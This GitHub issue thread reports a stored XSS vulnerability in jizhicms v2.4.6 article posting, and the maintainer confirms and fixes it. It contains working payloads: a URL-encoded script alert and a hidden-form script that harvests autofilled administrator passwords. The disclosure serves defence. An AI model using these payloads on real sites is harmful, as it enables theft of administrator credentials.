### ISSUE TITLE
jizhicms v2.4.6 has a XSS vulnerability  in the post article

### ISSUE THREAD

**Issue by 1y0ng** [Cherry-toto/jizhicms#86]
The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package. However, the backend administrator clicking on the article preview will launch this malicious JavaScript script
![图片](https://user-images.githubusercontent.com/112733473/233816990-d409149b-5075-427f-a580-d688a23b9a50.png)
When submitting, you can see that the post request sent is:
![图片](https://user-images.githubusercontent.com/112733473/233817010-e655435b-83e3-4ed0-960c-e4c9ad250ae5.png)
Modify the submitted content to:
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E
![图片](https://user-images.githubusercontent.com/112733473/233817035-520dd52a-f72c-499d-8e4e-c50836de17df.png)
At this point, if the administrator previews the submitted article, a pop-up window will appear
![图片](https://user-images.githubusercontent.com/112733473/233817060-d08308b8-dcd0-4121-9b3a-3f1ec3840192.png)
![图片](https://user-images.githubusercontent.com/112733473/233817061-34ccc79a-c4dd-4abe-9fdc-387a5b9c3099.png)
At this point, it indicates that the embedded JavaScript script has been maliciously executed
I know that the entire system's cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser's "automatic password filling" function, then the attacker can construct the following JavaScript script to obtain the administrator's plaintext password:
```
<p>test</p>
<form method="post" class="layui-form" onsubmit="return false;" hidden>
	<input name="cache" id="cache" type="hidden" value="" />
	<select name="lang"  lay-filter="lang">
		<option value="">选择语言</option>
		<option  selected  value="zh_cn">中文简体</option>
		<option  value="zh_cht">中文繁体</option>

	</select>
	<hr class="hr15">
	<input name="username" placeholder="用户名"  type="text" lay-verify="required" class="layui-input" >
	<hr class="hr15">
	<input name="password" lay-verify="required" placeholder="密码"  type="password" class="layui-input">
	<hr class="hr15">
	<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
	<hr class="hr20" >
</form>
<script>
	setTimeout(function() {
		const password = document.getElementsByName('password')[0].value;
		alert(`the password is：${password}`);
	}, 5000);
</script>
```
Submit the script after URL encoding
![图片](https://user-images.githubusercontent.com/112733473/233817213-aa2b2091-d3f0-4dce-8ba7-50b023cf072b.png)
Administrator clicks on preview:
![图片](https://user-images.githubusercontent.com/112733473/233817230-1fccfa0a-9ab8-4f3c-bf4e-d3f1c45c944e.png)
Here, the password plaintext has been pop-up displayed through the JavaScript script. If the pop-up function is modified to send the password plaintext to the attacker's server, the attacker will successfully obtain the administrator's plaintext password without the administrator's awareness
Modification suggestions:
Please filter the content of the article on the backend

**Comment by Cherry-toto** [comment]
你好，我尝试了一下，没有发现这个问题，请将你的这个测试发送到 demo.jizhicms.cn 上面，谢谢。

**Comment by Cherry-toto** [comment]
我找到了类似的问题，有人已经发布上去了，并没有出现问题：https://demo.jizhicms.cn/news/630.html

**Comment by 1y0ng** [comment]
> 我找到了类似的问题，有人已经发布上去了，并没有出现问题：https://demo.jizhicms.cn/news/630.html
Sorry,The webpage you provided me cannot be opened due to a 404 error
But I published an article called ’xsstest‘ and successfully executed the pop-up window by modifying the request package
![图片](https://user-images.githubusercontent.com/112733473/233970638-b2fe68e1-3009-4aa8-a884-e5c285a49e24.png)
In the preview interface, it is possible to pop up a window
![图片](https://user-images.githubusercontent.com/112733473/233971892-efdb071b-31ab-48d9-93d6-3a8e4b89e58b.png)
However, since I do not have approval and preview permissions in the backend interface, I am unable to conduct testing. However, since pop-up windows can occur in the preview of ordinary users in the backend, they should also occur in the preview of super administrators in the backend
![图片](https://user-images.githubusercontent.com/112733473/233972397-34077f8a-2196-478b-9179-1f4a186a6d86.png)

**Comment by Cherry-toto** [comment]
Good job !
非常厉害，但是我按照你的方式操作了一下，完美复现了效果！我将在近期修复这个bug，感谢！

**Comment by Cherry-toto** [comment]
已修复
